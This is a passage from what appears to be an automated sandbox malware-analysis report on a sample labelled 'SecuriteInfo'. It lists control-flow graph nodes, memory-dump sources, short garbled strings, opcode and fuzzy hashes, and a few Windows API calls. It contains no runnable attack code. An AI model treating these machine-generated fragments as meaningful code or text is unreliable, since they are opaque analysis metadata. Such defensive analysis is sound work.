73->90 91 fa720c-fa7226 73->91 75->30 79 fa7069-fa707b 75->79 79->30 81 fa7081-fa7099 79->81 144 fa709b call fa7438 81->144 145 fa709b call fa7428 81->145 85 fa70a1-fa70b1 85->43 89 fa70b7-fa70ba 85->89 86->12 87->86 92 fa70bc-fa70c2 89->92 93 fa70c4-fa70c7 89->93 90->43 95 fa7132-fa7136 90->95 91->1 113 fa722c-fa7230 91->113 92->93 96 fa70cd-fa70d0 92->96 93->21 93->96 98 fa7138-fa7145 95->98 99 fa715e-fa7164 95->99 100 fa70d8-fa70db 96->100 101 fa70d2-fa70d6 96->101 116 fa7147-fa7152 98->116 117 fa7154 98->117 103 fa719f-fa71a5 99->103 104 fa7166-fa716a 99->104 100->21 102 fa70e1-fa70e5 100->102 101->100 101->102 102->21 105 fa70eb-fa70f1 102->105 107 fa71b1-fa71b7 103->107 108 fa71a7-fa71ab 103->108 104->103 106 fa716c-fa7175 104->106 105->73 105->75 111 fa7177-fa717c 106->111 112 fa7184-fa719a 106->112 114 fa71b9-fa71bd 107->114 115 fa71c3-fa71c5 107->115 108->77 108->107 111->112 112->43 121 fa726c-fa7270 113->121 122 fa7232-fa723c call fa5b50 113->122 114->43 114->115 118 fa71fa-fa71fc 115->118 119 fa71c7-fa71d0 115->119 120 fa7156-fa7158 116->120 117->120 118->43 126 fa7202-fa7209 118->126 124 fa71df-fa71f5 119->124 125 fa71d2-fa71d7 119->125 120->43 120->99 121->77 128 fa7276-fa727a 121->128 122->121 132 fa723e-fa7253 122->132 124->43 125->124 128->77 131 fa7280-fa728d 128->131 135 fa728f-fa729a 131->135 136 fa729c 131->136 132->121 141 fa7255-fa726a 132->141 138 fa729e-fa72a0 135->138 136->138 138->43 138->77 141->1 141->121 144->85 145->85
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
              • API String ID: 0-1435242062
              • Opcode ID: a0e96f5c423f2e43273d8fae009f1dac6de67dfd928933104aac5e4b7ba3c02d
              • Instruction ID: dd4f6d94df0bf956fecd95fb2d3401cff468ae07566a44a1e0cb393fffe85116
              • Opcode Fuzzy Hash: a0e96f5c423f2e43273d8fae009f1dac6de67dfd928933104aac5e4b7ba3c02d
              • Instruction Fuzzy Hash: A5127971A046098FCB14DF68D984EAEBBF6FF8A314F158599E805DB2A1D730EC41DB50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 751 fa87e9-fa8805 752 fa8811-fa881d 751->752 753 fa8807-fa880c 751->753 756 fa881f-fa8821 752->756 757 fa882d-fa8832 752->757 754 fa8ba6-fa8bab 753->754 758 fa8829-fa882b 756->758 757->754 758->757 759 fa8837-fa8843 758->759 761 fa8853-fa8858 759->761 762 fa8845-fa8851 759->762 761->754 762->761 764 fa885d-fa8868 762->764 766 fa886e-fa8879 764->766 767 fa8912-fa891d 764->767 772 fa887b-fa888d 766->772 773 fa888f 766->773 770 fa8923-fa8932 767->770 771 fa89c0-fa89cc 767->771 780 fa8943-fa8952 770->780 781 fa8934-fa893e 770->781 782 fa89ce-fa89da 771->782 783 fa89dc-fa89ee 771->783 774 fa8894-fa8896 772->774 773->774 777 fa8898-fa88a7 774->777 778 fa88b6-fa88bb 774->778 777->778 789 fa88a9-fa88b4 777->789 778->754 791 fa8976-fa897f 780->791 792 fa8954-fa8960 780->792 781->754 782->783 790 fa8a1c-fa8a27 782->790 797 fa8a12-fa8a17 783->797 798 fa89f0-fa89fc 783->798 789->778 795 fa88c0-fa88c9 789->795 801 fa8b09-fa8b14 790->801 802 fa8a2d-fa8a36 790->802 803 fa8981-fa8993 791->803 804 fa8995 791->804 805 fa896c-fa8971 792->805 806 fa8962-fa8967 792->806 811 fa88cb-fa88d0 795->811 812 fa88d5-fa88e4 795->812 797->754 816 fa8a08-fa8a0d 798->816 817 fa89fe-fa8a03 798->817 820 fa8b3e-fa8b4d 801->820 821 fa8b16-fa8b20 801->821 818 fa8a38-fa8a4a 802->818 819 fa8a4c 802->819 808 fa899a-fa899c 803->808 804->808 805->754 806->754 808->771 814 fa899e-fa89aa 808->814 811->754 829 fa8908-fa890d 812->829 830 fa88e6-fa88f2 812->830 831 fa89ac-fa89b1 814->831 832 fa89b6-fa89bb 814->832 816->754 817->754 822 fa8a51-fa8a53 818->822 819->822 834 fa8b4f-fa8b5e 820->834 835 fa8ba1 820->835 837 fa8b22-fa8b2e 821->837 838 fa8b37-fa8b3c 821->838 827 fa8a63 822->827 828 fa8a55-fa8a61 822->828 836 fa8a68-fa8a6a 827->836 828->836 829->754 844 fa88fe-fa8903 830->844 845 fa88f4-fa88f9 830->845 831->754 832->754 834->835 849 fa8b60-fa8b78 834->849 835->754 841 fa8a6c-fa8a71 836->841 842 fa8a76-fa8a89 836->842 837->838 848 fa8b30-fa8b35 837->848 838->754 841->754 850 fa8a8b 842->850 851 fa8ac1-fa8acb 842->851 844->754 845->754 848->754 863 fa8b9a-fa8b9f 849->863 864 fa8b7a-fa8b98 849->864 852 fa8a8e-fa8a9f call fa8258 850->852 857 fa8aea-fa8af6 851->857 858 fa8acd-fa8ad9 call fa8258 851->858 860 fa8aa1-fa8aa4 852->860 861 fa8aa6-fa8aab 852->861 868 fa8af8-fa8afd 857->868 869 fa8aff 857->869 872 fa8adb-fa8ade 858->872 873 fa8ae0-fa8ae5 858->873 860->861 866 fa8ab0-fa8ab3 860->866 861->754 863->754 864->754 870 fa8ab9-fa8abf 866->870 871 fa8bac-fa8bc0 866->871 875 fa8b04 868->875 869->875 870->851 870->852 878 fa8c12 871->878 879 fa8bc2-fa8bd4 871->879 872->857 872->873 873->754 875->754 881 fa8c17-fa8c19 878->881 882 fa8be0-fa8beb 879->882 883 fa8bd6-fa8bdb 879->883 884 fa8c1b-fa8c2a 881->884 885 fa8c4e-fa8c60 881->885 890 fa8c93-fa8c9c 882->890 891 fa8bf1-fa8bfc 882->891 886 fa8d61-fa8d65 883->886 884->885 894 fa8c2c-fa8c42 884->894 892 fa8d5f 885->892 893 fa8c66-fa8c74 885->893 900 fa8c9e-fa8ca9 890->900 901 fa8ce7-fa8cf2 890->901 891->878 897 fa8bfe-fa8c10 891->897 892->886 902 fa8c80-fa8c83 893->902 903 fa8c76-fa8c7b 893->903 894->885 914 fa8c44-fa8c49 894->914 897->881 900->892 910 fa8caf-fa8cc1 900->910 912 fa8d08 901->912 913 fa8cf4-fa8d06 901->913 905 fa8c89-fa8c8c 902->905 906 fa8d66-fa8d96 call fa8378 902->906 903->886 905->893 911 fa8c8e 905->911 931 fa8d98-fa8dac 906->931 932 fa8dad-fa8db1 906->932 910->892 920 fa8cc7-fa8ccb 910->920 911->892 916 fa8d0d-fa8d0f 912->916 913->916 914->886 916->892 917 fa8d11-fa8d20 916->917 926 fa8d48 917->926 927 fa8d22-fa8d2b 917->927 923 fa8ccd-fa8cd2 920->923 924 fa8cd7-fa8cda 920->924 923->886 924->906 928 fa8ce0-fa8ce3 924->928 933 fa8d4d-fa8d4f 926->933 936 fa8d2d-fa8d3f 927->936 937 fa8d41 927->937 928->920 930 fa8ce5 928->930 930->892 933->892 935 fa8d51-fa8d5d 933->935 935->886 939 fa8d46 936->939 937->939 939->933
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 4']q$4']q$;]q
              • API String ID: 0-1096896373
              • Opcode ID: c43cd4cc5480596e403ddf1b1521f97a1ba5e1675405b6606e5f950f58be0f7c
              • Instruction ID: 7e4df8f02fd77d71ae3eac6021e3e25d45e42ba950acdb2bed2ed7104a719abf
              • Opcode Fuzzy Hash: c43cd4cc5480596e403ddf1b1521f97a1ba5e1675405b6606e5f950f58be0f7c
              • Instruction Fuzzy Hash: C1F1A1B1B141018FDB199B28C954B397796AFC77A4F1944AAE402CF3B1EEA8CC43E751

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1184 fa77f0-fa7cde 1259 fa8230-fa8265 1184->1259 1260 fa7ce4-fa7cf4 1184->1260 1264 fa8271-fa828f 1259->1264 1265 fa8267-fa826c 1259->1265 1260->1259 1261 fa7cfa-fa7d0a 1260->1261 1261->1259 1263 fa7d10-fa7d20 1261->1263 1263->1259 1266 fa7d26-fa7d36 1263->1266 1278 fa8291-fa829b 1264->1278 1279 fa8306-fa8312 1264->1279 1267 fa8356-fa835b 1265->1267 1266->1259 1268 fa7d3c-fa7d4c 1266->1268 1268->1259 1270 fa7d52-fa7d62 1268->1270 1270->1259 1271 fa7d68-fa7d78 1270->1271 1271->1259 1272 fa7d7e-fa7d8e 1271->1272 1272->1259 1274 fa7d94-fa7da4 1272->1274 1274->1259 1275 fa7daa-fa7dba 1274->1275 1275->1259 1277 fa7dc0-fa822f 1275->1277 1278->1279 1283 fa829d-fa82a9 1278->1283 1284 fa8329-fa8335 1279->1284 1285 fa8314-fa8320 1279->1285 1290 fa82ab-fa82b6 1283->1290 1291 fa82ce-fa82d1 1283->1291 1294 fa834c-fa834e 1284->1294 1295 fa8337-fa8343 1284->1295 1285->1284 1293 fa8322-fa8327 1285->1293 1290->1291 1305 fa82b8-fa82c2 1290->1305 1296 fa82e8-fa82f4 1291->1296 1297 fa82d3-fa82df 1291->1297 1293->1267 1294->1267 1375 fa8350 call fa87e9 1294->1375 1295->1294 1303 fa8345-fa834a 1295->1303 1299 fa835c-fa837e 1296->1299 1300 fa82f6-fa82fd 1296->1300 1297->1296 1307 fa82e1-fa82e6 1297->1307 1310 fa838e 1299->1310 1311 fa8380 1299->1311 1300->1299 1304 fa82ff-fa8304 1300->1304 1303->1267 1304->1267 1305->1291 1315 fa82c4-fa82c9 1305->1315 1307->1267 1314 fa8390-fa8391 1310->1314 1311->1310 1313 fa8387-fa838c 1311->1313 1313->1314 1315->1267 1375->1267
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: $]q$$]q
              • API String ID: 0-127220927
              • Opcode ID: 584e59df52bfd4aab787a5f00aff8d0502bf05a9215b6afe1552ffa369017c13
              • Instruction ID: 1a8f22ac76c6de6362c16a0d6938ab4840267282abd7efcc61726f7bdd06c1a2
              • Opcode Fuzzy Hash: 584e59df52bfd4aab787a5f00aff8d0502bf05a9215b6afe1552ffa369017c13
              • Instruction Fuzzy Hash: E0525574A00218CFEB159BA4D960B9FBBB6EF94300F1080A9D50A6B3A5CF345E45DFA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1628 fa56a8-fa56ca 1629 fa56cc-fa56d0 1628->1629 1630 fa56e0-fa56eb 1628->1630 1631 fa56f8-fa56ff 1629->1631 1632 fa56d2-fa56de 1629->1632 1633 fa5793-fa57bf 1630->1633 1634 fa56f1-fa56f3 1630->1634 1636 fa571f-fa5728 1631->1636 1637 fa5701-fa5708 1631->1637 1632->1630 1632->1631 1641 fa57c6-fa581e 1633->1641 1635 fa578b-fa5790 1634->1635 1733 fa572a call fa56a8 1636->1733 1734 fa572a call fa5698 1636->1734 1637->1636 1638 fa570a-fa5715 1637->1638 1640 fa571b-fa571d 1638->1640 1638->1641 1640->1635 1660 fa582d-fa583f 1641->1660 1661 fa5820-fa5826 1641->1661 1642 fa5730-fa5732 1643 fa573a-fa5742 1642->1643 1644 fa5734-fa5738 1642->1644 1646 fa5751-fa5753 1643->1646 1647 fa5744-fa5749 1643->1647 1644->1643 1649 fa5755-fa5774 call fa6108 1644->1649 1646->1635 1647->1646 1654 fa5789 1649->1654 1655 fa5776-fa577f 1649->1655 1654->1635 1731 fa5781 call faa70d 1655->1731 1732 fa5781 call faa650 1655->1732 1657 fa5787 1657->1635 1663 fa58d3-fa58d5 1660->1663 1664 fa5845-fa5849 1660->1664 1661->1660 1729 fa58d7 call fa5a63 1663->1729 1730 fa58d7 call fa5a70 1663->1730 1665 fa584b-fa5857 1664->1665 1666 fa5859-fa5866 1664->1666 1674 fa5868-fa5872 1665->1674 1666->1674 1667 fa58dd-fa58e3 1668 fa58ef-fa58f6 1667->1668 1669 fa58e5-fa58eb 1667->1669 1672 fa58ed 1669->1672 1673 fa5951-fa59b0 1669->1673 1672->1668 1689 fa59b7-fa59db 1673->1689 1677 fa589f-fa58a3 1674->1677 1678 fa5874-fa5883 1674->1678 1679 fa58af-fa58b3 1677->1679 1680 fa58a5-fa58ab 1677->1680 1686 fa5893-fa589d 1678->1686 1687 fa5885-fa588c 1678->1687 1679->1668 1685 fa58b5-fa58b9 1679->1685 1683 fa58f9-fa594a 1680->1683 1684 fa58ad 1680->1684 1683->1673 1684->1668 1688 fa58bf-fa58d1 1685->1688 1685->1689 1686->1677 1687->1686 1688->1668 1697 fa59dd-fa59df 1689->1697 1698 fa59e1-fa59e3 1689->1698 1701 fa5a59-fa5a5c 1697->1701 1702 fa59f4-fa59f6 1698->1702 1703 fa59e5-fa59e9 1698->1703 1704 fa59f8-fa59fc 1702->1704 1705 fa5a09-fa5a0f 1702->1705 1707 fa59eb-fa59ed 1703->1707 1708 fa59ef-fa59f2 1703->1708 1710 fa59fe-fa5a00 1704->1710 1711 fa5a02-fa5a07 1704->1711 1712 fa5a3a-fa5a3c 1705->1712 1713 fa5a11-fa5a38 1705->1713 1707->1701 1708->1701 1710->1701 1711->1701 1715 fa5a43-fa5a45 1712->1715 1713->1715 1719 fa5a4b-fa5a4d 1715->1719 1720 fa5a47-fa5a49 1715->1720 1721 fa5a4f-fa5a54 1719->1721 1722 fa5a56 1719->1722 1720->1701 1721->1701 1722->1701 1729->1667 1730->1667 1731->1657 1732->1657 1733->1642 1734->1642
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Haq$Haq
              • API String ID: 0-4016896955
              • Opcode ID: 9fe8044cb2109685ded7fa75fa185cd3e6f6807832148930f744235acc2672d3
              • Instruction ID: 83a93341c6d4492e3041244cc860065b4354ba10a9fa48052baeaba2504a39e6
              • Opcode Fuzzy Hash: 9fe8044cb2109685ded7fa75fa185cd3e6f6807832148930f744235acc2672d3
              • Instruction Fuzzy Hash: 33B1E2B1B046148FCB159F38D894B7E7BA6AF8A710F148969E446CB391DF38CC05E7A0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1736 fa5c08-fa5c15 1737 fa5c1d-fa5c1f 1736->1737 1738 fa5c17-fa5c1b 1736->1738 1740 fa5e30-fa5e37 1737->1740 1738->1737 1739 fa5c24-fa5c2f 1738->1739 1741 fa5e38 1739->1741 1742 fa5c35-fa5c3c 1739->1742 1745 fa5e3d-fa5e75 1741->1745 1743 fa5c42-fa5c51 1742->1743 1744 fa5dd1-fa5dd7 1742->1744 1743->1745 1746 fa5c57-fa5c66 1743->1746 1747 fa5dd9-fa5ddb 1744->1747 1748 fa5ddd-fa5de1 1744->1748 1761 fa5e7e-fa5e82 1745->1761 1762 fa5e77-fa5e7c 1745->1762 1754 fa5c7b-fa5c7e 1746->1754 1755 fa5c68-fa5c6b 1746->1755 1747->1740 1749 fa5e2e 1748->1749 1750 fa5de3-fa5de9 1748->1750 1749->1740 1750->1741 1752 fa5deb-fa5dee 1750->1752 1752->1741 1756 fa5df0-fa5e05 1752->1756 1757 fa5c8a-fa5c90 1754->1757 1759 fa5c80-fa5c83 1754->1759 1755->1757 1758 fa5c6d-fa5c70 1755->1758 1771 fa5e29-fa5e2c 1756->1771 1772 fa5e07-fa5e0d 1756->1772 1763 fa5ca8-fa5cc5 1757->1763 1764 fa5c92-fa5c98 1757->1764 1765 fa5d71-fa5d77 1758->1765 1766 fa5c76 1758->1766 1767 fa5cd6-fa5cdc 1759->1767 1768 fa5c85 1759->1768 1773 fa5e88-fa5e8a 1761->1773 1762->1773 1809 fa5cce-fa5cd1 1763->1809 1774 fa5c9a 1764->1774 1775 fa5c9c-fa5ca6 1764->1775 1776 fa5d79-fa5d7f 1765->1776 1777 fa5d8f-fa5d99 1765->1777 1770 fa5d9c-fa5d9e 1766->1770 1778 fa5cde-fa5ce4 1767->1778 1779 fa5cf4-fa5d06 1767->1779 1768->1770 1789 fa5da7-fa5da9 1770->1789 1771->1740 1780 fa5e1f-fa5e22 1772->1780 1781 fa5e0f-fa5e1d 1772->1781 1782 fa5e9f-fa5ea6 1773->1782 1783 fa5e8c-fa5e9e 1773->1783 1774->1763 1775->1763 1785 fa5d83-fa5d8d 1776->1785 1786 fa5d81 1776->1786 1777->1770 1787 fa5ce8-fa5cf2 1778->1787 1788 fa5ce6 1778->1788 1799 fa5d08-fa5d14 1779->1799 1800 fa5d16-fa5d39 1779->1800 1780->1741 1791 fa5e24-fa5e27 1780->1791 1781->1741 1781->1780 1785->1777 1786->1777 1787->1779 1788->1779 1794 fa5dab-fa5daf 1789->1794 1795 fa5dbd-fa5dbf 1789->1795 1791->1771 1791->1772 1794->1795 1803 fa5db1-fa5db5 1794->1803 1804 fa5dc3-fa5dc6 1795->1804 1810 fa5d61-fa5d6f 1799->1810 1800->1741 1812 fa5d3f-fa5d42 1800->1812 1803->1741 1805 fa5dbb 1803->1805 1804->1741 1806 fa5dc8-fa5dcb 1804->1806 1805->1804 1806->1743 1806->1744 1809->1770 1810->1770 1812->1741 1814 fa5d48-fa5d5a 1812->1814 1814->1810
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: ,aq$,aq
              • API String ID: 0-2990736959
              • Opcode ID: c5d2b218a5460267fc9d7c2eb4a4250ef3a0865cbf75454caa597c77e039908b
              • Instruction ID: 88351de8c26053a8737059469851a425c529655e5f2a926fd1ace63930cb5565
              • Opcode Fuzzy Hash: c5d2b218a5460267fc9d7c2eb4a4250ef3a0865cbf75454caa597c77e039908b
              • Instruction Fuzzy Hash: 8081B1B5A04A05DFCB14CFB8C488A6EB7B2FF8AB24B248169D405DB365D731ED41DB50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1816 fa3428-fa3441 1818 fa3452-fa345a 1816->1818 1819 fa3443-fa3445 1816->1819 1822 fa345c-fa346a 1818->1822 1820 fa344b-fa3450 1819->1820 1821 fa3447-fa3449 1819->1821 1820->1822 1821->1822 1825 fa346c-fa346e 1822->1825 1826 fa3480-fa3488 1822->1826 1827 fa3470-fa3475 1825->1827 1828 fa3477-fa347e 1825->1828 1830 fa348b-fa348e 1826->1830 1827->1830 1828->1830 1831 fa3490-fa349e 1830->1831 1832 fa34a5-fa34a9 1830->1832 1831->1832 1840 fa34a0 1831->1840 1833 fa34ab-fa34b9 1832->1833 1834 fa34c2-fa34c5 1832->1834 1833->1834 1841 fa34bb 1833->1841 1835 fa34cd-fa3502 1834->1835 1836 fa34c7-fa34cb 1834->1836 1845 fa3564-fa3569 1835->1845 1836->1835 1839 fa3504-fa351b 1836->1839 1842 fa351d-fa351f 1839->1842 1843 fa3521-fa352d 1839->1843 1840->1832 1841->1834 1842->1845 1846 fa352f-fa3535 1843->1846 1847 fa3537-fa3541 1843->1847 1848 fa3549 1846->1848 1847->1848 1849 fa3543 1847->1849 1851 fa3551-fa355d 1848->1851 1849->1848 1851->1845
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Xaq$Xaq
              • API String ID: 0-1488805882
              • Opcode ID: daeee8bd7212c9d11aa3a9106e12a8d45a547b2b5e1864b25a828af5909118b1
              • Instruction ID: ee6956cad828324ad96b54cc08d87c872e86491c14ca9b5c2f3c7f3f39075377
              • Opcode Fuzzy Hash: daeee8bd7212c9d11aa3a9106e12a8d45a547b2b5e1864b25a828af5909118b1
              • Instruction Fuzzy Hash: 8131F7B2F043258BDF1D8E69599427EA5DABBCA320F184439FC06C3384DF74CE05A661
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: LR]q
              • API String ID: 0-3081347316
              • Opcode ID: 2bf18f9da8015e017edcd9380e17c5990192e03151c5cfd034f617a08e496ee4
              • Instruction ID: 5076ac7af798c90a51368e66eb7e2f2ed5b08acd22de06ed638c016ec511f28c
              • Opcode Fuzzy Hash: 2bf18f9da8015e017edcd9380e17c5990192e03151c5cfd034f617a08e496ee4
              • Instruction Fuzzy Hash: 5E220974A14219CFCB54EF64ED85A9DBBB1FF88300F1085A9D809AB369DB346D49CF50
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: LR]q
              • API String ID: 0-3081347316
              • Opcode ID: bfdc5a2311447b6fa53f0002f8f4464da22b1349325778bbe0b29632be56edae
              • Instruction ID: d2069aeeef02236a4daff6375da9331eb08ef7a3b381464fd91de07922874ead
              • Opcode Fuzzy Hash: bfdc5a2311447b6fa53f0002f8f4464da22b1349325778bbe0b29632be56edae
              • Instruction Fuzzy Hash: 2D22F874914219CFCB54EF64ED89A9DBBB1FF88300F1085A9D809AB369DB346D49CF50
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05648D59
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: 17cf8729502a6b4a978b4873557801bc8f9d299441fbee18f26168265b0582c8
              • Instruction ID: accffc53fe1753633264785fc2ae378e64fa8b2d724ccf9556b9438e13caafa8
              • Opcode Fuzzy Hash: 17cf8729502a6b4a978b4873557801bc8f9d299441fbee18f26168265b0582c8
              • Instruction Fuzzy Hash: AB41E5B4A002099FCB14DF99C488AAAFBF6FF99314F24C459D519AB321D774A941CFA0
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05647E6E,?,?,?,?,?), ref: 05647F2F
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 6fa247d9ef5edc386ff66bd4e7ec447437cd3186bf84ff976faa59a8f70be6d6
              • Instruction ID: 727946fdbd63f1da992be825a429312eca088329e9706bc59b40b4e535fc25b5
              • Opcode Fuzzy Hash: 6fa247d9ef5edc386ff66bd4e7ec447437cd3186bf84ff976faa59a8f70be6d6
              • Instruction Fuzzy Hash: AD21E3B59002489FDB10CFAAD584AEEBBF9FB48310F14805AE918A7310D378A951CFA1
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05647E6E,?,?,?,?,?), ref: 05647F2F
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: da67d68d055b775288a2dc68dc7bcb08f823ec6af73b43e8d63d86bd4a804fc2
              • Instruction ID: 98570ebbdefe9cbcd8755750e3a5eb639becde6300f5acebf4f6b3b04e17703c
              • Opcode Fuzzy Hash: da67d68d055b775288a2dc68dc7bcb08f823ec6af73b43e8d63d86bd4a804fc2
              • Instruction Fuzzy Hash: 2A21DFB69012489FDB10CFAAD584AEEBFF4FB48310F14841AE959A3310D378A955CFA1
              APIs
              • SetTimer.USER32(?,02976428,?,?), ref: 05648F4D
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: Timer
              • String ID:
              • API String ID: 2870079774-0
              • Opcode ID: 55c1f4b6abf3ddf7b03cf5db350f847ab51a6caeda4a33c1093a28032e0e75c1
              • Instruction ID: 2a10ecc05dd129787d656e0fa9a530c1d2b4b8c5cf9bb6fb30d44fcc7ba926c7
              • Opcode Fuzzy Hash: 55c1f4b6abf3ddf7b03cf5db350f847ab51a6caeda4a33c1093a28032e0e75c1
              • Instruction Fuzzy Hash: 8511F2B58003499FCB10DF9AD484BEEBBF9EB48310F10845AE918A7310C379A944CFA5
              APIs
              • SetTimer.USER32(?,02976428,?,?), ref: 05648F4D
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: Timer
              • String ID:
              • API String ID: 2870079774-0
              • Opcode ID: a22cad5d1a725e233c302719370807a28e23c921dc1303a3fcb709c58b1d3238
              • Instruction ID: 367b92b818c99938e870d90d8208e34b059283488b6bd9424a41b22b830b7db6
              • Opcode Fuzzy Hash: a22cad5d1a725e233c302719370807a28e23c921dc1303a3fcb709c58b1d3238
              • Instruction Fuzzy Hash: 5A11E3B58002499FDB10DF99D545BDEFBF8EB49310F108459E558A3200C375A544CFA1
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q
              • API String ID: 0-794736227
              • Opcode ID: d9ec371c22d02d1461e89f18c94919e3f41489b7640e2d5c1685f24fc7432057
              • Instruction ID: e746211f5c0eb31297e2c7c6f097c38b57823d4c690ae6d711aaed8a4789e819
              • Opcode Fuzzy Hash: d9ec371c22d02d1461e89f18c94919e3f41489b7640e2d5c1685f24fc7432057
              • Instruction Fuzzy Hash: A341DB35B042488FDB159B78D854ABE7BF2AFC9310F1448A9E946D7391CE358C16CBA1
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cf3a2770c3ccbb8dbc82b589105fe9f91a3f244b34780bd3794a3e39e7038ed
              • Instruction ID: 496391d3750279730424f1a7b84b7f666dd925438772b61c09f3527b690d4628
              • Opcode Fuzzy Hash: 9cf3a2770c3ccbb8dbc82b589105fe9f91a3f244b34780bd3794a3e39e7038ed
              • Instruction Fuzzy Hash: 62423274A0021CCFEB159BA4D960B9FBBB6EF94300F1080A9D50A6B3A5CF345E45DFA5
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e272caa67b1a6eae6bc2c3ad66d71aab230bf16b8be9fd4eff3f39e301ab3dc2
              • Instruction ID: 92cc4dfa1f53723362fb6e5cd31854882459cc27902e5a29af2edcbb2cc8c0e4
              • Opcode Fuzzy Hash: e272caa67b1a6eae6bc2c3ad66d71aab230bf16b8be9fd4eff3f39e301ab3dc2
              • Instruction Fuzzy Hash: 98F13DB1E402158FCB04CFACC9849ADBBF6FF89350B1A8059E415AB362C735EC45DB61
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
